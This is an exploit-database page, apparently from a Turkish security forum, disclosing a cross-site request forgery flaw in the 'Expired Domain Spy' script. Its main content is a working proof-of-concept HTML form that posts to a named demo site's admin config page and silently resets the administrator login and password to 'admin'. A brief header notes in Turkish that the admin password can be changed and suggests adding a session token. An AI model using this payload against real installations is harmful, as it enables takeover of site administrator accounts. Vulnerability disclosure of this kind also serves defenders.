Expired Domain Spy ~ XSRF Vuln. | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > Expired Domain Spy ~ XSRF Vuln.

Madde
	Author : Bug Researchers/Kadir DOGAN
	Date : 12.07.2009 21:05:32
	# Expired Domain Spy ~ XSRF Vuln. [Full Screen Display]

	<------------------- header data start ------------------- > ############################################################# # author * : UzmiX ~ Kadir DOGAN # Script Name : Expired Domain Spy # Bug Type : XSRF # Infection : Admin Sifresi Deistirilebilir. # Demo Script : http://e-topbiz.com/trafficdemos/expiredomains1/ # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir. ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <form action=http://www.e-topbiz.com/trafficdemos/expiredomains1/config/?page=admin name=f method=post enctype=multipart/form-data> Admin’s login <td><input type=text class=text name=admlogin value=admin> Admin’s password <td><input type=password class=text name=admpasswd value=admin> Confirmation <td><input type=password class=text name=admconfirm value=admin> <input type=submit name=save value=Ok class=button> < -- bug code end of -- >